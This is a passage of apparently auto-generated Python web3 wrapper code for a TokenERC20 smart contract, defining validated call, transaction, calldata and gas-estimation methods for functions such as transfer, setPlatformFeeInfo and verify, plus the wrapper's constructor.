return self._underlying_method(role, account).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).estimateGas(
tx_params.as_dict()
)
class SetContractUriMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the setContractURI method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, uri: str):
"""Validate the inputs to the setContractURI method."""
self.validator.assert_valid(
method_name="setContractURI",
parameter_name="_uri",
argument_value=uri,
)
return uri
def call(self, uri: str, tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(uri) = self.validate_and_normalize_inputs(uri)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(uri).call(tx_params.as_dict())
def send_transaction(
self, uri: str, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(uri) = self.validate_and_normalize_inputs(uri)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(uri).transact(tx_params.as_dict())
def build_transaction(
self, uri: str, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(uri) = self.validate_and_normalize_inputs(uri)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(uri).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, uri: str, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(uri) = self.validate_and_normalize_inputs(uri)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(uri).estimateGas(tx_params.as_dict())
class SetPlatformFeeInfoMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the setPlatformFeeInfo method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, platform_fee_recipient: str, platform_fee_bps: int
):
"""Validate the inputs to the setPlatformFeeInfo method."""
self.validator.assert_valid(
method_name="setPlatformFeeInfo",
parameter_name="_platformFeeRecipient",
argument_value=platform_fee_recipient,
)
platform_fee_recipient = self.validate_and_checksum_address(
platform_fee_recipient
)
self.validator.assert_valid(
method_name="setPlatformFeeInfo",
parameter_name="_platformFeeBps",
argument_value=platform_fee_bps,
)
# safeguard against fractional inputs
platform_fee_bps = int(platform_fee_bps)
return (platform_fee_recipient, platform_fee_bps)
def call(
self,
platform_fee_recipient: str,
platform_fee_bps: int,
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(
platform_fee_recipient,
platform_fee_bps,
) = self.validate_and_normalize_inputs(
platform_fee_recipient, platform_fee_bps
)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(platform_fee_recipient, platform_fee_bps).call(
tx_params.as_dict()
)
def send_transaction(
self,
platform_fee_recipient: str,
platform_fee_bps: int,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(
platform_fee_recipient,
platform_fee_bps,
) = self.validate_and_normalize_inputs(
platform_fee_recipient, platform_fee_bps
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
platform_fee_recipient, platform_fee_bps
).transact(tx_params.as_dict())
def build_transaction(
self,
platform_fee_recipient: str,
platform_fee_bps: int,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(
platform_fee_recipient,
platform_fee_bps,
) = self.validate_and_normalize_inputs(
platform_fee_recipient, platform_fee_bps
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
platform_fee_recipient, platform_fee_bps
).buildTransaction(tx_params.as_dict())
def estimate_gas(
self,
platform_fee_recipient: str,
platform_fee_bps: int,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(
platform_fee_recipient,
platform_fee_bps,
) = self.validate_and_normalize_inputs(
platform_fee_recipient, platform_fee_bps
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
platform_fee_recipient, platform_fee_bps
).estimateGas(tx_params.as_dict())
class SetPrimarySaleRecipientMethod(
ContractMethod
): # pylint: disable=invalid-name
"""Various interfaces to the setPrimarySaleRecipient method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, sale_recipient: str):
"""Validate the inputs to the setPrimarySaleRecipient method."""
self.validator.assert_valid(
method_name="setPrimarySaleRecipient",
parameter_name="_saleRecipient",
argument_value=sale_recipient,
)
sale_recipient = self.validate_and_checksum_address(sale_recipient)
return sale_recipient
def call(
self, sale_recipient: str, tx_params: Optional[TxParams] = None
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(sale_recipient) = self.validate_and_normalize_inputs(sale_recipient)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(sale_recipient).call(tx_params.as_dict())
def send_transaction(
self, sale_recipient: str, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(sale_recipient) = self.validate_and_normalize_inputs(sale_recipient)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(sale_recipient).transact(
tx_params.as_dict()
)
def build_transaction(
self, sale_recipient: str, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(sale_recipient) = self.validate_and_normalize_inputs(sale_recipient)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(sale_recipient).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, sale_recipient: str, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(sale_recipient) = self.validate_and_normalize_inputs(sale_recipient)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(sale_recipient).estimateGas(
tx_params.as_dict()
)
class SupportsInterfaceMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the supportsInterface method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, interface_id: Union[bytes, str]):
"""Validate the inputs to the supportsInterface method."""
self.validator.assert_valid(
method_name="supportsInterface",
parameter_name="interfaceId",
argument_value=interface_id,
)
return interface_id
def call(
self,
interface_id: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(interface_id) = self.validate_and_normalize_inputs(interface_id)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(interface_id).call(
tx_params.as_dict()
)
return bool(returned)
def send_transaction(
self,
interface_id: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(interface_id) = self.validate_and_normalize_inputs(interface_id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(interface_id).transact(
tx_params.as_dict()
)
def build_transaction(
self,
interface_id: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(interface_id) = self.validate_and_normalize_inputs(interface_id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(interface_id).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
interface_id: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(interface_id) = self.validate_and_normalize_inputs(interface_id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(interface_id).estimateGas(
tx_params.as_dict()
)
class SymbolMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the symbol method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return str(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class TotalSupplyMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the totalSupply method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return int(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class TransferMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the transfer method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, to: str, amount: int):
"""Validate the inputs to the transfer method."""
self.validator.assert_valid(
method_name="transfer",
parameter_name="to",
argument_value=to,
)
to = self.validate_and_checksum_address(to)
self.validator.assert_valid(
method_name="transfer",
parameter_name="amount",
argument_value=amount,
)
# safeguard against fractional inputs
amount = int(amount)
return (to, amount)
def call(
self, to: str, amount: int, tx_params: Optional[TxParams] = None
) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(to, amount) = self.validate_and_normalize_inputs(to, amount)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(to, amount).call(
tx_params.as_dict()
)
return bool(returned)
def send_transaction(
self, to: str, amount: int, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(to, amount) = self.validate_and_normalize_inputs(to, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(to, amount).transact(
tx_params.as_dict()
)
def build_transaction(
self, to: str, amount: int, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(to, amount) = self.validate_and_normalize_inputs(to, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(to, amount).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, to: str, amount: int, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(to, amount) = self.validate_and_normalize_inputs(to, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(to, amount).estimateGas(
tx_params.as_dict()
)
class TransferFromMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the transferFrom method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, _from: str, to: str, amount: int):
"""Validate the inputs to the transferFrom method."""
self.validator.assert_valid(
method_name="transferFrom",
parameter_name="from",
argument_value=_from,
)
_from = self.validate_and_checksum_address(_from)
self.validator.assert_valid(
method_name="transferFrom",
parameter_name="to",
argument_value=to,
)
to = self.validate_and_checksum_address(to)
self.validator.assert_valid(
method_name="transferFrom",
parameter_name="amount",
argument_value=amount,
)
# safeguard against fractional inputs
amount = int(amount)
return (_from, to, amount)
def call(
self,
_from: str,
to: str,
amount: int,
tx_params: Optional[TxParams] = None,
) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(_from, to, amount) = self.validate_and_normalize_inputs(
_from, to, amount
)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(_from, to, amount).call(
tx_params.as_dict()
)
return bool(returned)
def send_transaction(
self,
_from: str,
to: str,
amount: int,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(_from, to, amount) = self.validate_and_normalize_inputs(
_from, to, amount
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(_from, to, amount).transact(
tx_params.as_dict()
)
def build_transaction(
self,
_from: str,
to: str,
amount: int,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(_from, to, amount) = self.validate_and_normalize_inputs(
_from, to, amount
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(_from, to, amount).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
_from: str,
to: str,
amount: int,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(_from, to, amount) = self.validate_and_normalize_inputs(
_from, to, amount
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(_from, to, amount).estimateGas(
tx_params.as_dict()
)
class UnpauseMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the unpause method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method().call(tx_params.as_dict())
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class VerifyMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the verify method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, req: ITokenERC20MintRequest, signature: Union[bytes, str]
):
"""Validate the inputs to the verify method."""
self.validator.assert_valid(
method_name="verify",
parameter_name="_req",
argument_value=req,
)
self.validator.assert_valid(
method_name="verify",
parameter_name="_signature",
argument_value=signature,
)
return (req, signature)
def call(
self,
req: ITokenERC20MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> Tuple[bool, str]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(req, signature).call(
tx_params.as_dict()
)
return (
returned[0],
returned[1],
)
def send_transaction(
self,
req: ITokenERC20MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(req, signature).transact(
tx_params.as_dict()
)
def build_transaction(
self,
req: ITokenERC20MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(req, signature).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
req: ITokenERC20MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(req, signature).estimateGas(
tx_params.as_dict()
)
# pylint: disable=too-many-public-methods,too-many-instance-attributes
class TokenERC20:
"""Wrapper class for TokenERC20 Solidity contract.
All method parameters of type `bytes`:code: should be encoded as UTF-8,
which can be accomplished via `str.encode("utf_8")`:code:.
"""
default_admin_role: DefaultAdminRoleMethod
"""Constructor-initialized instance of
:class:`DefaultAdminRoleMethod`.
"""
domain_separator: DomainSeparatorMethod
"""Constructor-initialized instance of
:class:`DomainSeparatorMethod`.
"""
allowance: AllowanceMethod
"""Constructor-initialized instance of
:class:`AllowanceMethod`.
"""
approve: ApproveMethod
"""Constructor-initialized instance of
:class:`ApproveMethod`.
"""
balance_of: BalanceOfMethod
"""Constructor-initialized instance of
:class:`BalanceOfMethod`.
"""
burn: BurnMethod
"""Constructor-initialized instance of
:class:`BurnMethod`.
"""
burn_from: BurnFromMethod
"""Constructor-initialized instance of
:class:`BurnFromMethod`.
"""
checkpoints: CheckpointsMethod
"""Constructor-initialized instance of
:class:`CheckpointsMethod`.
"""
contract_type: ContractTypeMethod
"""Constructor-initialized instance of
:class:`ContractTypeMethod`.
"""
contract_uri: ContractUriMethod
"""Constructor-initialized instance of
:class:`ContractUriMethod`.
"""
contract_version: ContractVersionMethod
"""Constructor-initialized instance of
:class:`ContractVersionMethod`.
"""
decimals: DecimalsMethod
"""Constructor-initialized instance of
:class:`DecimalsMethod`.
"""
decrease_allowance: DecreaseAllowanceMethod
"""Constructor-initialized instance of
:class:`DecreaseAllowanceMethod`.
"""
delegate: DelegateMethod
"""Constructor-initialized instance of
:class:`DelegateMethod`.
"""
delegate_by_sig: DelegateBySigMethod
"""Constructor-initialized instance of
:class:`DelegateBySigMethod`.
"""
delegates: DelegatesMethod
"""Constructor-initialized instance of
:class:`DelegatesMethod`.
"""
get_past_total_supply: GetPastTotalSupplyMethod
"""Constructor-initialized instance of
:class:`GetPastTotalSupplyMethod`.
"""
get_past_votes: GetPastVotesMethod
"""Constructor-initialized instance of
:class:`GetPastVotesMethod`.
"""
get_platform_fee_info: GetPlatformFeeInfoMethod
"""Constructor-initialized instance of
:class:`GetPlatformFeeInfoMethod`.
"""
get_role_admin: GetRoleAdminMethod
"""Constructor-initialized instance of
:class:`GetRoleAdminMethod`.
"""
get_role_member: GetRoleMemberMethod
"""Constructor-initialized instance of
:class:`GetRoleMemberMethod`.
"""
get_role_member_count: GetRoleMemberCountMethod
"""Constructor-initialized instance of
:class:`GetRoleMemberCountMethod`.
"""
get_votes: GetVotesMethod
"""Constructor-initialized instance of
:class:`GetVotesMethod`.
"""
grant_role: GrantRoleMethod
"""Constructor-initialized instance of
:class:`GrantRoleMethod`.
"""
has_role: HasRoleMethod
"""Constructor-initialized instance of
:class:`HasRoleMethod`.
"""
increase_allowance: IncreaseAllowanceMethod
"""Constructor-initialized instance of
:class:`IncreaseAllowanceMethod`.
"""
initialize: InitializeMethod
"""Constructor-initialized instance of
:class:`InitializeMethod`.
"""
is_trusted_forwarder: IsTrustedForwarderMethod
"""Constructor-initialized instance of
:class:`IsTrustedForwarderMethod`.
"""
mint_to: MintToMethod
"""Constructor-initialized instance of
:class:`MintToMethod`.
"""
mint_with_signature: MintWithSignatureMethod
"""Constructor-initialized instance of
:class:`MintWithSignatureMethod`.
"""
multicall: MulticallMethod
"""Constructor-initialized instance of
:class:`MulticallMethod`.
"""
name: NameMethod
"""Constructor-initialized instance of
:class:`NameMethod`.
"""
nonces: NoncesMethod
"""Constructor-initialized instance of
:class:`NoncesMethod`.
"""
num_checkpoints: NumCheckpointsMethod
"""Constructor-initialized instance of
:class:`NumCheckpointsMethod`.
"""
pause: PauseMethod
"""Constructor-initialized instance of
:class:`PauseMethod`.
"""
paused: PausedMethod
"""Constructor-initialized instance of
:class:`PausedMethod`.
"""
permit: PermitMethod
"""Constructor-initialized instance of
:class:`PermitMethod`.
"""
primary_sale_recipient: PrimarySaleRecipientMethod
"""Constructor-initialized instance of
:class:`PrimarySaleRecipientMethod`.
"""
renounce_role: RenounceRoleMethod
"""Constructor-initialized instance of
:class:`RenounceRoleMethod`.
"""
revoke_role: RevokeRoleMethod
"""Constructor-initialized instance of
:class:`RevokeRoleMethod`.
"""
set_contract_uri: SetContractUriMethod
"""Constructor-initialized instance of
:class:`SetContractUriMethod`.
"""
set_platform_fee_info: SetPlatformFeeInfoMethod
"""Constructor-initialized instance of
:class:`SetPlatformFeeInfoMethod`.
"""
set_primary_sale_recipient: SetPrimarySaleRecipientMethod
"""Constructor-initialized instance of
:class:`SetPrimarySaleRecipientMethod`.
"""
supports_interface: SupportsInterfaceMethod
"""Constructor-initialized instance of
:class:`SupportsInterfaceMethod`.
"""
symbol: SymbolMethod
"""Constructor-initialized instance of
:class:`SymbolMethod`.
"""
total_supply: TotalSupplyMethod
"""Constructor-initialized instance of
:class:`TotalSupplyMethod`.
"""
transfer: TransferMethod
"""Constructor-initialized instance of
:class:`TransferMethod`.
"""
transfer_from: TransferFromMethod
"""Constructor-initialized instance of
:class:`TransferFromMethod`.
"""
unpause: UnpauseMethod
"""Constructor-initialized instance of
:class:`UnpauseMethod`.
"""
verify: VerifyMethod
"""Constructor-initialized instance of
:class:`VerifyMethod`.
"""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
validator: TokenERC20Validator = None,
):
"""Get an instance of wrapper for smart contract.
:param web3_or_provider: Either an instance of `web3.Web3`:code: or
`web3.providers.base.BaseProvider`:code:
:param contract_address: where the contract has been deployed
:param validator: for validation of method inputs.
"""
# pylint: disable=too-many-statements
self.contract_address = contract_address
if not validator:
validator = TokenERC20Validator(web3_or_provider, contract_address)
web3 = None
if isinstance(web3_or_provider, BaseProvider):
web3 = Web3(web3_or_provider)
elif isinstance(web3_or_provider, Web3):
web3 = web3_or_provider
else:
raise TypeError(
"Expected parameter 'web3_or_provider' to be an instance of either"
+ " Web3 or BaseProvider"
)
# if any middleware was imported, inject it
try:
MIDDLEWARE
except NameError:
pass
else:
try:
for middleware in MIDDLEWARE:
web3.middleware_onion.inject(
middleware["function"],
layer=middleware["layer"],
)
except ValueError as value_error:
if value_error.args == (
"You can't add the same un-named instance twice",
):
pass
self._web3_eth = web3.eth
functions = self._web3_eth.contract(
address=to_checksum_address(contract_address), abi=TokenERC20.abi()
).functions
self.default_admin_role = DefaultAdminRoleMethod(
web3_or_provider, contract_address, functions.DEFAULT_ADMIN_ROLE
)
self.domain_separator = DomainSeparatorMethod(
web3_or_provider, contract_address, functions.DOMAIN_SEPARATOR
)
self.allowance = AllowanceMethod(
web3_or_provider, contract_address, functions.allowance, validator
)
self.approve = ApproveMethod(
web3_or_provider, contract_address, functions.approve, validator
)
self.balance_of = BalanceOfMethod(
web3_or_provider, contract_address, functions.balanceOf, validator
)
self.burn = BurnMethod(
web3_or_provider, contract_address, functions.burn, validator
)
self.burn_from = BurnFromMethod(
web3_or_provider, contract_address, functions.burnFrom, validator
)
self.checkpoints = CheckpointsMethod(
web3_or_provider,
contract_address,
functions.checkpoints,
validator,
)
self.contract_type = ContractTypeMethod(
web3_or_provider, contract_address, functions.contractType
)
self.contract_uri = ContractUriMethod(
web3_or_provider, contract_address, functions.contractURI
)
self.contract_version = ContractVersionMethod(
web3_or_provider, contract_address, functions.contractVersion
)
self.decimals = DecimalsMethod(
web3_or_provider, contract_address, functions.decimals
)
self.decrease_allowance = DecreaseAllowanceMethod(
web3_or_provider,
contract_address,
functions.decreaseAllowance,
validator,
)
self.delegate = DelegateMethod(
web3_or_provider, contract_address, functions.delegate, validator
)
self.delegate_by_sig = DelegateBySigMethod(
web3_or_provider,
contract_address,
functions.delegateBySig,
validator,
)
self.delegates = DelegatesMethod(
web3_or_provider, contract_address, functions.delegates, validator
)
self.get_past_total_supply = GetPastTotalSupplyMethod(
web3_or_provider,
contract_address,
functions.getPastTotalSupply,
validator,
)
self.get_past_votes = GetPastVotesMethod(
web3_or_provider,
contract_address,
functions.getPastVotes,
validator,
)
self.get_platform_fee_info = GetPlatformFeeInfoMethod(
web3_or_provider, contract_address, functions.getPlatformFeeInfo
)
self.get_role_admin = GetRoleAdminMethod(
web3_or_provider,
contract_address,
functions.getRoleAdmin,
validator,
)
self.get_role_member = GetRoleMemberMethod(
web3_or_provider,
contract_address,
functions.getRoleMember,
validator,
)
self.get_role_member_count = GetRoleMemberCountMethod(
web3_or_provider,
contract_address,
functions.getRoleMemberCount,
validator,
)
self.get_votes = GetVotesMethod(
web3_or_provider, contract_address, functions.getVotes, validator
)
self.grant_role = GrantRoleMethod(
web3_or_provider, contract_address, functions.grantRole, validator
)
self.has_role = HasRoleMethod(
web3_or_provider, contract_address, functions.hasRole, validator
)
self.increase_allowance = IncreaseAllowanceMethod(
web3_or_provider,
contract_address,
functions.increaseAllowance,
validator,
)
self.initialize = InitializeMethod(
web3_or_provider, contract_address, functions.initialize, validator
)
self.is_trusted_forwarder = IsTrustedForwarderMethod(
web3_or_provider,
contract_address,
functions.isTrustedForwarder,
validator,
)
self.mint_to = MintToMethod(
web3_or_provider, contract_address, functions.mintTo, validator
)
self.mint_with_signature = MintWithSignatureMethod(
web3_or_provider,
contract_address,
functions.mintWithSignature,
validator,
)
self.multicall = MulticallMethod(
web3_or_provider, contract_address, functions.multicall, validator
)
self.name = NameMethod(
web3_or_provider, contract_address, functions.name
)
self.nonces = NoncesMethod(
web3_or_provider, contract_address, functions.nonces, validator
)
self.num_checkpoints = NumCheckpointsMethod(
web3_or_provider,
contract_address,
functions.numCheckpoints,
validator,
)
self.pause = PauseMethod(
web3_or_provider, contract_address, functions.pause
)
self.paused = PausedMethod(
web3_or_provider, contract_address, functions.paused
)
self.permit = PermitMethod(
web3_or_provider, contract_address, functions.permit, validator
)
self.primary_sale_recipient = PrimarySaleRecipientMethod(
web3_or_provider, contract_address, functions.primarySaleRecipient
)
self.renounce_role = RenounceRoleMethod(
web3_or_provider,
contract_address,
functions.renounceRole,
validator,
)
self.revoke_role = RevokeRoleMethod(
web3_or_provider, contract_address, functions.revokeRole, validator
)
self.set_contract_uri = SetContractUriMethod(
web3_or_provider,
contract_address,
functions.setContractURI,
validator,
)
self.set_platform_fee_info = SetPlatformFeeInfoMethod(
web3_or_provider,
contract_address,
functions.setPlatformFeeInfo,
validator,
)
self.set_primary_sale_recipient = SetPrimarySaleRecipientMethod(
web3_or_provider,
contract_address,
functions.setPrimarySaleRecipient,
validator,
)
self.supports_interface = SupportsInterfaceMethod(
web3_or_provider,
contract_address,
functions.supportsInterface,
validator,
)
self.symbol = SymbolMethod(
web3_or_provider, contract_address, functions.symbol
)
self.total_supply = TotalSupplyMethod(
web3_or_provider, contract_address, functions.totalSupply
)
self.transfer = TransferMethod(
web3_or_provider, contract_address, functions.transfer, validator
)
self.transfer_from = TransferFromMethod(
web3_or_provider,
contract_address,
functions.transferFrom,
validator,
)
self.unpause = UnpauseMethod(
web3_or_provider, contract_address, functions.unpause
)
self.verify = VerifyMethod(
web3_or_provider, contract_address, functions.verify, validator
)
def get_approval_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for Approval event.
:param tx_hash: hash of transaction emitting Approval event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC20.abi(),
)
.events.Approval()
